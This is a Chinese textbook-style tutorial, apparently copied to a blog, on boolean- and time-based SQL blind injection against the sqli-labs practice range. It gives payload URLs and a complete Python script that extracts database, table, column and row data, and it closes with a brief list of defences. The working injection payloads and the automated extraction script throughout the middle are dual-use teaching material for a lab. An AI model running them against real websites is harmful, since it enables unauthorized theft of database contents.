Lyx-0607
Lyx-0607

SQL盲注漏洞

 

 

在进行SQL注入攻击时,若确定有注入点但因页面没有回显位来显示数据, 导致无法获取有效信息时,就要进行SQL盲注。

 

 

 

 

 

 

5.3.1    简介

 

目前常用的SQL盲注主要分以下两类:

·基于布尔的盲注:当页面没有回显位、不会输出SQL语句报错信息时,通过 返回页面响应的正常或不正常的情况来进行注入。

·基于时间的盲注:当页面没有回显位、不会输出SQL语句报错信息、不论 SQL语句的执行结果对错都返回一样的页面时,通过页面的响应时间来进行注 入。

上述两种盲注方式都存在的缺点就是需要耗费大量的精力去进行测试,因此 在渗透测中常使用工具或脚本来代替手工操作,完成烦琐的注入过程。

sqli-labs是由一位印度程序员编写的SQL注入练习靶场,包含多种类型的注入 方式,接下来将会在sqli-labs环境下具体讲解SQL盲注脚本的编写过程。

 

 

 

 

 

5.3.2    基于布尔型SQL盲注检测

 

本节以sqli-labs靶场的第八关为例。该关的SQL查询语句为SELECT*FROM users WHERE id='$id'LIMIT 0 ,1。

如果盲注的结果正确,则会显示“You are in...........” ,如图5-5所示。

如果盲注的结果错误,则不会显示“You are in...........” ,如图5-6所示。

那么,我们只需要提前构造相应的注入语句,然后根据页面是否回显“You

are in...........”来进行判断即可,让脚本进行自动化操作。笔者已经构造好所需的

Payload ,代码如下所示:

>>> http://127 .0 .0 .1/sql/Less-8/?id=1 ' and if(length(database())=8,1,0) %23

# 获取数据库名

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if(ascii(subst r(database(),1,1))=115, 1,0) %23

# 获取数据库表的数量

>>> http://127 .0 .0 .1/sql/Less-8/?id=1 ' and if((select count(*)table_name

from information_schema .tables where table_schema= 'security ')=4,1,0) %23

# 获取数据库表名称的长度

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if((select LENGTH(table_name) from information_schema .tables where table_schema= 'security ' limit 1,1)=

8,1,0) %23

# 获取数据库表名

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if(ascii(subst r((select table_name

from information_schema .tables where table_schema= 'security ' limit 0,1), 1,1))=101,1,0) %23

# 获取表的字段数量

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if((select count(column_name) from

information_schema .columns where table_schema= 'security ' and table_name= 'users ')=3,1,0) %23

# 获取字段的长度

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if((select length(column_name) from

information_schema .columns where table_schema= 'security ' and table_name= 'users ' limit 0,1)=2,1,0) %23

# 获取表的字段

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if(ascii(subst r((select column_name  from information_schema .columns where table_schema= 'security ' and table _name= 'users ' limit 0,1),1,1))=105,1,0) %23

# 获取字段数据的数量

>>> http://127 .0 .0 .1/Less-8/?id=1 'and if ((select count(username) from

users)=13,1,0) %23

# 获取字段数据的长度

>>> http://127 .0 .0 .1/Less-8/?id=1 'and if ((select length(username) from

users limit 0,1)=4,1,0) %23

# 获取字段数据

>>> http://127 .0 .0 .1/Less-8/?id=1 'and if (ascii(subst r((select username

from users limit 0,1),1,1))=68,1,0) %23

 

 

 

 

 

图5-6    布尔注入结果错误

1)写入脚本信息,导入模块,定义存储数据库数据的变量且定义一个request 对象用来进行请求,代码如下:

 

#!/usr/bin/python3

# -*- coding: utf-8 -*-

 

import requests

import optparse

 

# 存放数据库名的变量

DBName = ""

# 存放数据库表的变量

DBTables = []

# 存放数据库字段的变量

DBColumns = []

# 存放数据字典的变量,键为字段名,值为字段数据列表

DBData = {}

# 若页面返回真,则会出现“You are in . . . . . . . . . . .”

flag = "You are in . . . . . . . . . . ."

# 设置重连次数以及将连接改为短连接

# 防止因为HTTP连接数过多导致的 Max retries exceeded with url问题

requests .adapters .DEFAULT_RETRIES = 5

conn = requests .session()

conn .keep_alive = False

2)编写主函数,用来调用各个函数进行自动化注入,代码如下:

 

 

 

 

 

 

# 盲注主函数

def StartSqli(url) :

GetDBName(url)

print("[+]当前数据库名 :{0}" .format(DBName))

GetDBTables(url,DBName)

print("[+]数据库{0}的表如下 :" .format(DBName))

for item in range(len(DBTables)) :

print("(" + str(item + 1) + ")" + DBTables[item])

tableIndex = in t(input("[*]请输入要查看的表的序号 :")) - 1

GetDBColumns(url,DBName,DBTables[tableIndex])

while True:

print("[+]数据表{0}的字段如下 :" .format(DBTables[tableIndex]))

for item in range(len(DBColumns)) :

print("(" + str(item + 1) + ")" + DBColumns[item])

columnIndex = in t(input("[*]请输入要查看的字段的序号(输入0退出) :"))-1 if(columnIndex == -1) :

break

else:

GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])

 

3)编写获取数据库名的函数,根据得到的URL获取数据库名并把最后的结 果存入DBName:

def GetDBName(url) :

# 引用全局变量DBName,用来存放网页当前使用的数据库名

global DBName

print("[-]开始获取数据库名的长度")

# 保存数据库名长度的变量

DBNameLen = 0

# 用于检查数据库名长度的payload

payload = " ' and if(length(database())={0},1,0) %23"

# 把URL和payload进行拼接,得到最终请求的URL

targetUrl = url + payload

# 用for循环来遍历请求,得到数据库名的长度

for DBNameLen in range(1, 99) :

# 对payload中的参数进行赋值猜解

res = conn .get(targetUrl.format(DBNameLen))

# 判断flag是否在返回的页面中

if flag in res .content.decode("utf-8") :

print("[+]数据库名的长度 :" + str(DBNameLen))

break

print("[-]开始获取数据库名")

payload = " ' and if(ascii(subst r(database(),{0},1))={1},1,0) %23"

targetUrl = url + payload

# a表示subst r()函数的截取起始位置

for a in range(1, DBNameLen+1) :

# b表示在ASCII码中33~126位可显示的字符

for b in range(33, 127) :

res = conn .get(targetUrl.format(a,b))

if flag in res .content.decode("utf-8") :

DBName += chr(b)

print("[-]"+ DBName)

break

4)编写获取数据库表的函数,根据获取到的URL和数据库名获取数据库中 的表,并把结果以列表的形式存入DBTables:

 

# 获取数据库表的函数

def GetDBTables(url, dbname) :

global DBTables

# 存放数据库表数量的变量

 

 

 

 

 

DBTableCount = 0

print("[-]开始获取{0}数据库表数量 :" .format(dbname))

# 获取数据库表数量的payload

payload = " ' and if((select count(*)table_name from information_schema . tables where table_schema= '{0} ')={1},1,0) %23"

targetUrl = url + payload

# 开始遍历获取数据库表的数量

for DBTableCount in range(1, 99) :

res = conn .get(targetUrl.format(dbname, DBTableCount))

if flag in res .content.decode("utf-8") :

print("[+]{0}数据库中表的数量为 :{1}" .format(dbname, DBTableCount)) break

print("[-]开始获取{0}数据库的表" .format(dbname))

# 遍历表名时临时存放表名长度的变量

tableLen = 0

# a表示当前正在获取表的索引

for a in range(0,DBTableCount) :

print("[-]正在获取第{0}个表名" .format(a+1))

# 先获取当前表名的长度

for tableLen in range(1, 99) :

payload = " ' and if((select LENGTH(table_name) from

information_schema .tables where table_schema= '{0} '

limit {1},1)={2},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbname, a, tableLen))

if flag in res .content.decode("utf-8") :

break

# 开始获取表名

# 临时存放当前表名的变量

table = ""

# b表示当前表名猜解的位置

for b in range(1, tableLen+1) :

payload = " ' and if(ascii(subst r((select table_name from

information_schema .tables where table_schema= '{0} ' limit {1},1),{2},1))={3},1,0) %23"

targetUrl = url + payload

# c表示在ASCII码中33~126位可显示的字符

for c in range(33, 127) :

res = conn .get(targetUrl.format(dbname, a, b, c))

if flag in res .content.decode("utf-8") :

table += chr(c)

print(table)

break

# 把获取到的表名加入DBTables

DBTables .append(table)

# 清空table,用来继续获取下一个表名

table = ""

5)编写获取表字段的函数,根据获取的URL 、数据库名和数据库表,获取 表的字段并把结果以列表的形式存入DBColumns:

def GetDBColumns(url, dbname, dbtable) :

global DBColumns

# 存放字段数量的变量

DBColumnCount = 0

print("[-]开始获取{0}数据表的字段数 :" .format(dbtable))

for DBColumnCount in range(99) :

payload = " ' and if((select count(column_name) from information_  schema .columns where table_schema= '{0} ' and table_name= '{1} ')

={2},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbname, dbtable, DBColumnCount)) if flag in res .content.decode("utf-8") :

print("[-]{0}数据表的字段数为 :{1}" .format(dbtable, DBColumnCount))

break

# 开始获取字段的名称

 

 

 

 

 

# 保存字段名的临时变量

column = ""

# a表示当前获取字段的索引

for a in range(0, DBColumnCount) :

print("[-]正在获取第{0}个字段名" .format(a+1))

# 先获取字段的长度

for columnLen in range(99) :

payload = " ' and if((select length(column_name) from information_ schema .columns where table_schema= '{0} ' and table_name= '{1} '  limit {2},1)={3},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbname, dbtable, a, columnLen)) if flag in res .content.decode("utf-8") :

break

# b表示当前字段名猜解的位置

for b in range(1, columnLen+1) :

payload = " ' and if(ascii(subst r((select column_name from

information_schema .columns where table_schema= '{0} ' and

table_name= '{1} ' limit {2},1),{3},1))={4},1,0) %23"

targetUrl = url + payload

# c表示在ASCII码中33~126位可显示的字符

for c in range(33, 127) :

res = conn .get(targetUrl.format(dbname, dbtable, a, b, c)) if flag in res .content.decode("utf-8") :

column += chr(c)

print(column)

break

# 把获取到的字段名加入DBColumns

DBColumns .append(column)

# 清空column,用来继续获取下一个字段名

column = ""

6)编写数据获取函数,根据获取的URL 、数据表名和数据表字段来获取数 据。数据以字典的形式存放,键为字段名,值为字段数据形成的列表:

# 获取表数据的函数

def GetDBData(url,dbtable,dbcolumn) :

global DBData

# 先获取字段的数据数量

DBDataCount = 0

print("[-]开始获取{0}表{1}字段的数据数量" .format(dbtable, dbcolumn))

for DBDataCount in range(99) :

payload = "'and if ((select count({0}) from {1})={2},1,0)  %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbcolumn, dbtable, DBDataCount)) if flag in res .content.decode("utf-8") :

print("[-]{0}表{1}字段的数据数量为 :{2}" .format(dbtable, dbcolumn, DBDataCount))

break

for a in range(0, DBDataCount) :

print("[-]正在获取{0}的第{1}个数据" .format(dbcolumn, a+1))

# 先获取这个数据的长度

dataLen = 0

for dataLen in range(99) :

payload = "'and if ((select length({0}) from {1} limit {2},1) ={3},1,0)  %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbcolumn, dbtable, a, dataLen)) if flag in res .content.decode("utf-8") :

print("[-]第{0}个数据长度为 :{1}" .format(a+1, dataLen))

break

# 临时存放数据内容变量

data = ""

# 开始获取数据的具体内容

# b表示当前数据内容猜解的位置

for b in range(1, dataLen+1) :

for c in range(33, 127) :

 

 

 

 

 

payload = "'and if (ascii(subst r((select {0} from {1} limit {2},1),{3},1))={4},1,0)  %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbcolumn, dbtable, a, b, c)) if flag in res .content.decode("utf-8") :

data += chr(c)

print(data)

break

# 放到以字段名为键,值为列表的字典中

DBData .setdefault(dbcolumn,[]) .append(data)

print(DBData)

# 把data清空,继续获取下一个数据

data = ""

 

7)编写主函数,用来获取目标的URL并传递给StartSqli:

if __name__ == '__main__ ' :

parser = optparse .OptionParser( 'usage: python %prog -u url \n\n ' 'Example: python %prog  -u http://192 .168 .61 .1/sql/Less-8/?id=1\n ')

# 目标URL参数-u

parser .add_option( '-u ', '--url ', dest= 'targetURL ',default= 'http://

127.0.0.1/sql/Less-8/?id=1', type= 'string ',help= 'target URL ')

(options, args) = parser .parse_args()

StartSqli(options .targetURL)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

5.3.3    基于时间型SQL盲注检测

 

本节以sqli-labs靶场的第九关为例。该关的SQL查询语句为SELECT*FROM users WHERE id='$id'LIMIT 0 ,1。

这关不管语句正确还是错误,页面始终显示“Your are in...........” ,如图5-7所

示,所以我们只能通过基于时间的盲注方法来获取数据,根据页面的返回时间来 判断结果。

 

完成注入过程所需的Payload的代码如下:

# 判断数据库名的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(length(database())=8,sleep(5), 0) %23

# 获取数据库名

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r(database(),1,1)) =115,sleep(5),0)%23

# 获取数据库中表的数量

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select count(table_name) from

information_schema .tables where table_schema= 'security ' )=4,sleep(5),0) %23

# 获取数据库表的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select length(table_name)

from information_schema .tables where table_schema= 'security ' limit 0,1)= 6,sleep(5),0) %23

# 获取数据库表

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r((select table_

name from information_schema .tables where table_schema= 'security ' limit 0,1),1,1))=101,sleep(5),0)%23

# 获取数据库表中字段的数量

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select count(column_name) from information_schema .columns where table_schema= 'security ' and

table_name= 'users ')=3,sleep(5),0) %23

# 获取表字段的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select length(column_name) from information_schema .columns where table_schema= 'security ' and

table_name= 'users ' limit 0,1)=2,sleep(5),0) %23

 

 

 

 

# 获取数据库字段

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r((select column_ name from information_schema .columns where table_schema= 'security ' and table_name= 'users ' limit 0,1),1,1))=105,sleep(5),0) %23

# 获取字段数据的数量

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select count(username) from users)=13,sleep(5),0) %23

# 获取字段数据的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select length(username) from users limit 0,1)=4,sleep(5),0) %23

# 获取数据内容

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r((select username from users limit 0,1),1,1))=68,sleep(5),0) %23

 

本节的代码与基于布尔的盲注脚本十分相似,不同之处在于此处脚本需要用 到time模块,判断结果的语句和所使用的Payload不相同。以下将列出部分代码, 读者可当作练习自行完成编写,若有疑问,可参考源代码。

获取数据库名的函数代码如下:

# 获取数据库名的函数

def GetDBName(url) :

# 引用全局变量DBName,用来存放网页当前使用的数据库名

global DBName

print("[-]开始获取数据库名的长度")

# 保存数据库名长度的变量

DBNameLen = 0

# 用于检查数据库名长度的payload

payload = " ' and if(length(database())={0},sleep(5),0) %23"

# 把URL和payload进行拼接,得到最终的请求URL

targetUrl = url + payload

# 用for循环来遍历请求,得到数据库名的长度

for DBNameLen in range(1, 99) :

# 开始时间

timeStart = time .time()

# 开始访问

res = conn .get(targetUrl.format(DBNameLen))

# 结束时间

timeEnd = time .time()

# 判断时间差

if timeEnd - timeStart >= 5:

print("[+]数据库名的长度 :" + str(DBNameLen))

break

print("[-]开始获取数据库名")

payload = " ' and if(ascii(subst r(database(),{0},1))={1},sleep(5),0)%23" targetUrl = url + payload

# a表示subst r()函数的截取起始位置

for a in range(1, DBNameLen+1) :

# b表示在ASCII码中33~126位可显示的字符

for b in range(33, 127) :

timeStart = time .time()

res = conn .get(targetUrl.format(a,b))

timeEnd = time .time()

if timeEnd - timeStart >= 5:

DBName += chr(b)

print("[-]"+ DBName)

break

下面测试一下效果。

 

 

 

 

 

获取数据库名如下所示:

获取数据库表如下所示:

 

 

 

 

 

获取字段数据,如下所示:

 

 

 

 

 

 

 

 

 

 

 

5.3.4    防御策略

 

SQL盲注属于SQL注入的一种方式。下面介绍的几种防御方法可以有效降低 SQL注入对网站的危害:

1)用参数化查询的方式代替动态SQL。

2)避免显示数据库的错误信息。

3)在服务器上安装Web应用程序防火墙(Web Application Firewall, WAF)。

4)限制数据库的权限。

5)对于数据库中的敏感信息进行加密保存。

6)根据需求升级数据库的版本,避免旧版数据库中的已知漏洞。

 

你可能感兴趣的:(笔记)

  • 用,才是最好的读 微澜随笔
    今年一年我读了很多书,得有一百来本吧!仿佛是要把过去十多年浪费的时间全都弥补回来。有时候读不下去也会逼着自己读。这种发泄似的读书,是时光已逝,我还站在原地的一种焦虑;是在滚滚红尘中苦苦挣扎的一种无奈。最近我发现读过的书好多都毫无印象,丝毫不记得里面写了什么。有些则是大道理、名言金句耳熟能详,笔记做了厚厚一本,而我却不知道它有什么用。最近读剽悍一只猫大大的《一年顶十年》,读到里边一句话我有种醍醐灌顶
  • Datawhale AI夏令营第五期魔搭-CV竞赛方向Task1笔记--初识yolo模型 切记 我是一个 温柔的 刀客 YOLO目标检测机器学习
    DatawhaleAI夏令营第五期魔搭-CV竞赛方向Task1笔记–初识yolo模型作者:福州大学我是一个温柔的刀客2024/8/221.赛题简介本赛题最终目标是开发一套智能识别系统,能够自动检测和分类城市管理中的违规行为。该系统应利用先进的图像处理和计算机视觉技术,通过对摄像头捕获的视频进行分析,自动准确识别违规行为,并及时向管理部门发出告警,以实现更高效的城市管理。本质上是属于CV中的目标检测
  • 2023-11-17【日复盘】 逃熙
    你好,我是小熙,欢迎打开我的日复盘。每天给自己20分钟复盘时间,重新察审视自己一下吧。总是忙着低头砍树,记得抽空磨磨刀。希望能给你启发:✅一、习惯养成✅输出早上复盘-✅写作-✅加班写了1个大纲拍摄部分vlog碎片、剪辑文笔练习、图文笔记-✅运动养生跑步/步行30分钟以上✅走路上下班天鹅颈-跑步机-✅10分钟有进步呀马甲线-✅饮食健康早晨:豆浆+咖啡✅感觉喝了假速溶咖啡,不太精神?哈哈哈午餐:食堂里
  • 笛卡尔空间轨迹规划笔记 玄离715 轨迹规划python
    1我要进行笛卡尔空间规划,为什么还要将路径上的每个笛卡尔空间点逆解为对应的关节角度,使用关节空间轨迹规划算法规划机械臂的轨迹呢?将路径上的每个笛卡尔空间点逆解为对应的关节角度,使用关节空间轨迹规划算法规划机械臂的轨迹的目的是为了保证机械臂能够精确地沿着所规划的轨迹运动。虽然笛卡尔空间规划方法能够方便地指定机械臂的运动轨迹,但是由于机械臂的构造和限制,实际上只能够通过关节角度来控制机械臂的运动。因此
  • 每天写文章很累,但是我一直在坚持。 一杯烟火
    ,企鹅号,今日头条,趣头条,这些都要我去写文章,10点四十了发现上有一个日更挑战还没有写文章,我有点开开始创作,作为一个自媒体人,真的很累很累,说自媒体赚到钱的都是一些开培训机构的大佬,像自己单打独斗能挣到钱的真的很少很少,但是有一点不可否认,那就是写文章对自己有帮助,这是一个好习惯,这对以后的人生有帮助,所以就算是自媒体赚不到钱,那么作为自己发笔记的平台也不错,大家加油。图片发自App
  • python基础笔记_Python基础笔记 weixin_39687786 python基础笔记
    [基础部分]Python是一种解释型的、面向对象的、带有动态语义的高级程序设计语言。输出方式:print“Helloworld”空值是Python里一个特殊的值,用None表示。关于除法运算:默认只取整数部分的结果:1/2=0.要得到小数:1.0/2或者1.0/2.0幂(乘方)运算:2**4=16表示2的4次方。关于长整型数:普通整数不能大于2147483647也不能小于-2147483648,否
  • 图解数据结构python读书笔记_python cookbook3读书笔记第一章数据结构和算法 eternal?
    pythonheapq模块查询一组序列中最大和最小的数据importheapqnums=[1,8,2,23,7,-4,18,23,42,37,]#获取序列中3个最大值#print(heapq.nlargest(3,nums))#获取序列中3个最小值#print(heapq.nsmallest(3,nums))#把数据压入堆中在堆中最小的那个数值永远排在最前面时间想取出最小的3个数值只需执行3次he
  • 线性代数-MIT 18.06-6(a) 儒雅的钓翁 数学基础线性代数矩阵机器学习
    文章目录26.对称矩阵及正定性对称矩阵对称矩阵的特性:矩阵分解(谱定理)定理证明和复数推广对称矩阵和投影矩阵正定性性质1性质227.复数矩阵和快速傅里叶变换复数向量复数矩阵对称性正交性傅里叶矩阵快速傅里叶变换本文在学习《麻省理工公开课线性代数MIT18.06LinearAlgebra》总结反思形成视频链接:MITB站视频笔记部分:总结参考子实26.对称矩阵及正定性对称矩阵对称矩阵的特性:特征值为实
  • 践行日志3:今天感觉好多了(2021.1.12) 我的蔗蔗
    昨天虽然说了重新出发,但做的事情一点儿都没改变(惯性真可怕!)。今天感觉自己表现好多了。一、跟诺诺的相处这个月的目标是不轻易发脾气。图妈说,不轻易发脾气,那要怎么样?来个肯定句。我们的大脑就像一把枪,指哪打哪。我心里想的是,想发脾气时努力忍住,还有努力共情,如果我是她。。。晚上接了诺放学回家,有一搭没一搭地聊着。她说:妈妈,今天我们美术作业是做个笔记本,我想要你和我一起做,我自己不会。我说:你希望
  • 《善恶的彼岸》笔记——第五章论道德的自然史(2) 买烤鱼
    190“人人都不想受到损害,因此一切恶都不是故意的。因为恶人也损害了自己:他若是知道这事是恶的,他便不会做了。如此说来,恶人的恶,只是由于一个错误。若是恶人摆脱这个错误,恶人必然会变好。”这种推理方式散发着贱民的气味,他们只看到恶行有糟糕的下场,就判断“行恶是愚蠢的”,而他们的“善”也不过等同于“有用和舒适”。这种苏格拉底式的道德功利主义出现在柏拉图的道德中,是违背了高贵的柏拉图的初衷。体会:尼采
  • 求任意两顶点间最短路算法及其matlab程序详解 夏天天天天天天天# 图论算法图论matlab
    #################本文为学习《图论算法及其MATLAB实现》的学习笔记#################算法用途图中任意两点间最短路的求法算法思想利用求最短路的Floyd算法的思想。首先,求得最短距离矩阵;然后,求任意给定两个顶点间的最短路所包含的顶点。程序参数说明W:图的权值矩阵k1:始点k2:终点P:k1,k2之间的最短路,顶点以经过次序排列u:最短路的距离算法的matlab程
  • html语言及js脚本基础,Javascript基础学习笔记(菜鸟必看篇) 游苏昱 html语言及js脚本基础
    什么是变量?变量是用于存储信息的容器变量的声明语法:var变量名变量名=值;变量要先声明再赋值变量可以重复赋值变量的命名规则变量必须以字母开头;变量也能以$和_符号开头(不过我们不推荐这么做);变量名称对大小写敏感(a和A是不同的变量)。语句语句以一个分号结尾;如果省略分号,则由解析器确定语句的结尾。有个好的编码习惯,都要以;结尾数据类型在JavaScript中,一段信息就是一个值(value)。
  • 2018年7月25日 星期三 多云亲子日记第227篇 爱你心上
    今天早晨起来我就感觉很热,敞开门出去一股热气冲到脸上,就像下了火炉似的。我本想把空调关掉,出去一趟回来也没有关空调,关上空调太热了。今天太热了也不想做饭,于是我就出去买了点饭给儿子吃,儿子就愿意吃外面的饭。我买饭回来后叫儿子赶紧起床吃饭,吃完饭他就开始读书写读书笔记,然后自己关上门在卧室里学习,儿子一关门我就是不放心他在里面自己学习,我怕他学习干别的,所以只要他关门我就把网线给拔下来,反正也没有手
  • 菜鸟笔记-001 如何用JavaScript脚本在文字中实现向左或向右插入空格 胤祥矢量商铺 菜鸟学习笔记笔记illustratorjavascript文字操作
    这是一个网友在线上问我的一个问题:如何用JavaScript脚本在文字中实现向左或向右插入空格下图是在文字左边插入了1/2个空格的效果:那么如何用javascript实现向左向右插入空格?其实这个功能,我在实际工作确实很少碰到,我只有祭出宝典查阅-IllustratorJavaScriptScriptingReference2022.pdf,当然你有更新版的更好。查到文字的向左插入空格或向左插入空
  • 读书串讲 逆生长
    2022-1-6早课分享新知1.十三戒律的践行,再糟糕的坚持也好过放弃,践行十三戒律是慢就是快。2.有终身目标去奋斗,面对质疑和怀疑以及不理解,无需争辩,交给时间,时间是最好的证明。3.做好一件事以后,再做下一件事,不要一次性开始太多的东西。4.先获得的美德有助于其他美德的养成。5.读书早起,效率手册和总结笔记。6.十三戒律中早中午时间安排张弛有度,对照自己的时间安排。7.坚持了才有希望,错误的时
  • 《神奇的早起》日记14-2022-08-17 糖糖82
    睡觉时间:23:15起床时间:5:00睡眠时间:5小时45钟早起计划任务情况:1.昨日计划情况原计划内容:完成15周课程笔记梳理。完成情况:完成了一半2.今日计划情况计划内容:完成另一半15周笔记梳理今日思考:1.今日起床居然不困,一下醒过来了,只是做运动时感觉整个人快不起来,所以做完防瞌睡一系列动作时间到5:45了,比原来计划的5:30晚了15分钟,观察最近执行早起计划的总体情况,计划22:00
  • 网络思科笔记 张小胡 网络笔记
    思科笔记网络什么是计算机网络?通过传输介质和网络设备将多台计算机连在一起实现资源共享和信息传递就是计算机网络。作用:资源共享、信息传递、提高处理能力、增加可靠性;计算机的组成:计算机之间沟通的语言—–协议、传输介质、网络设备;人:沟通用语言空气设备电脑:沟通用协议传输介质网络设备(交换机、路由器、VPN)网络起源:网络的前身是美国国防部高级研究计划局用于军事目的的通信网络。20世纪60年代末,正处
  • 经验笔记:Hadoop 漆黑的莫莫 随手笔记笔记hadoop大数据
    Hadoop经验笔记一、Hadoop概述Hadoop是一个开源软件框架,用于分布式存储和处理大规模数据集。其设计目的是为了在商用硬件上运行,具备高容错性和可扩展性。Hadoop的核心是HadoopDistributedFileSystem(HDFS)和YARN(YetAnotherResourceNegotiator),这两个组件加上MapReduce编程模型,构成了Hadoop的基本架构。二、H
  • Kafka ACK机制详解笔记 modelsetget kafkakafka分布式ACK机制
    1.ACK机制简介目的:确保生产者发送的消息可靠地写入Kafka集群。核心:生产者发送消息后需等待Kafka集群的确认。2.ACK级别acks=0:不等待确认,效率最高,但可能丢数据。acks=1:等待Leader分区确认,可靠性较高,但Leader故障可能丢数据(Kafka2.0默认值)。acks=all(或-1):等待所有ISR分区确认,最可靠,但性能较低。3.ISR(In-SyncRepli
  • 经验笔记:Request 与 Response 漆黑的莫莫 计算机网络笔记
    Request与Response经验笔记一、基础知识Request(请求):当客户端需要从服务器获取数据或让服务器执行某个操作时,它会发送一个请求给服务器。请求包含了所需操作的信息,例如请求类型(GET、POST等)、目标资源的URL以及其他可能需要的数据(如参数、认证信息等)。Response(响应):服务器收到客户端的请求后,会根据请求的内容进行相应的处理,并返回一个响应给客户端。响应通常包含
  • 《数据思维课》学习笔记之一 昌平老刘
    我是那种特别、特别、特别不愿意花钱去学习的人。一方面是由于吝啬的天性,另一方面,则是由于不信任。在这个时代,只要花钱,基本上就意味着又上了一次当。当然也有例外。《得到》上的课程,有一个好处,可以先试读试学五节课,如果觉得不怎么样,那就随它去,花钱还在其次,主要是不能再继续浪费时间。有一个叫宣明栋的老师,据他自我介绍说是负责《得到》品控的,工作三十多年了,一直在跟数据打交道,完全有资格有能力开设这么
  • unity3D学习笔记之三:全局光照 watl0 UnityUnity
    本文整理自Unity全球官方网站,原文:UNITY5-LIGHTINGANDRENDERING(文章较长,请耐心阅读)简介全局光照,简称GI,是一个用来模拟光的互动和反弹等复杂行为的算法,要精确的仿真全局光照非常有挑战性,付出的代价也高,正因为如此,现代游戏会先一定程度的预先处理这些计算,而非游戏执行时实时运算。同一场景里:没有照明(左),只有直接光源(中),和有间接光源的全局光照(右)的表现,注
  • 《随园诗话》学习笔记三百零一 飞鸿雪舞
    卷四人所难言,我易言之七十六、妙诗【原文】余宰江宁时,查宣门居士开赠《蔗塘诗》一集,盖其族人心谷先生为仁所作。本籍海宁,寓居天津,十九岁即经患难,在狱八年,始得释归;怜才爱士,置驿通宾,其诗清妙,盖深得初白老人之教者。《同友集空谷园》云:“郊居尘埃少,幽访共沿回。柳下孤篷泊,花间白版开。高人还掩卧,稚子识曾来。小立窥鸥鹭,忘机客不猜。”《秋夜病中》云:“巷尾迢迢报柝声,虚堂如水断人行。云移一朵月吞
  • (清)竹禅花鸟人物作品 郑辉贤国学艺术
    僧。俗姓王氏,四川梁山人,住锡上海龙华寺。工书、画,其水墨人物、山水、竹石,人谓别成一派,题画诗亦佳。光绪(一八七五―一九o八)间返蜀示寂。《海上墨林》、《韬养斋笔记》、《益州书画录》素材来源网络,版权归原作者所有!
  • 【论文笔记】Training language models to follow instructions with human feedback B部分 Ctrl+Alt+L 大模型论文整理论文笔记论文阅读语言模型人工智能自然语言处理
    TraininglanguagemodelstofollowinstructionswithhumanfeedbackB部分回顾一下第一代GPT-1:设计思路是“海量无标记文本进行无监督预训练+少量有标签文本有监督微调”范式;模型架构是基于Transformer的叠加解码器(掩码自注意力机制、残差、Layernorm);下游各种具体任务的适应是通过在模型架构的输出后增加线性权重WyW_{y}Wy实
  • 《活法》读书笔记 泰然七六
    阅读人:彭俊珺阅读内容:与其追求开悟,不如运用理性和良心去磨砺心志谈到灵魂,许多人会表示抵触。但是,我们常常听到的或者我们体验到的一些个案,如果否定灵魂的存在就无法解释。所谓“濒死体验”就是其中之一。因疾病或事故“死过”一次的人,会感到自己从身体中飘浮出来,从上面看到自己躺在床上接受治疗的情形,或者会窥见不可思议的世界。经历过这种体验之后,再度苏醒,起死回生,我的朋友中就有经历过“濒死体验”的人。
  • 数据结构(邓俊辉)学习笔记】串 10——BM_BC算法:坏字符 诸葛悠闲 数据结构学习笔记
    文章目录1.坏字符2.特殊情况1.坏字符实际上,刚才的实例中我们所展示的那样一个计算过程,就是所谓BM算法所采用的策略之一,而这一策略,将我们刚才所说的教训称作坏字符。在这里,不妨改为基于蛮力算法的第二个版本来进行改造。也就是说模式算中当前参与比对的如果是字符P[j],那么文本串中对应的就是T[i+j],这幅图画出的就是这样一个一般性的场景。请注意,当前这趟扫描如果的确已经抵达P[j]或T[i+j
  • 时序预测相关论文阅读笔记 能力越小责任越小YA 论文阅读笔记时序预测Transformer
    笔记链接:【有道云笔记】读论文(记录)https://note.youdao.com/s/52ugLbot用于个人学习记录。
  • 《幸得诸君慰平生》读书笔记 彩云悦读乐教
    近日翻出来这本书,从年龄上来说,作者是比我大的,但她说的似乎也有我童年的影子。也许我也被带出去玩过,可是完全不记得了,她怎么能记住那么多的故事?看这些故事的时候,感觉自己又回到幼时又过了一遍,虽然其中有很多很多的模糊与空白。印象最深的应是开篇的那位担心鸟说他坏话还试图分析鸟语的姨夫,边看我就边想起去年的时候,妈妈每天在网上用语言控诉那些鸟儿怎么毁了她的菜,她又如何跟它们作斗争的。家楼顶上种了些蔬菜
  • 读书笔记:毛选 矛盾论 思过勿论非
    《矛盾论》是毛选最精华的文章之一,也是贯穿整部毛选的思维方法,如果搞不懂矛盾论,那么也很难弄懂分析问题,思考问题的逻辑。《矛盾论》开篇就强调“事物的矛盾法则,即对立统一的法则,是唯物辩证法的最根本的法则。”这是强调矛盾是最根本的,最基础的法则,通俗的来讲辩证法就是研究矛盾。并且用德波林学派的唯心论去批判党内的教条主义作风。诠释了两种宇宙观点:一种是形而上学的见解,一种是辩证法的见解。其中形而上学,
  • java类加载顺序 3213213333332132 java
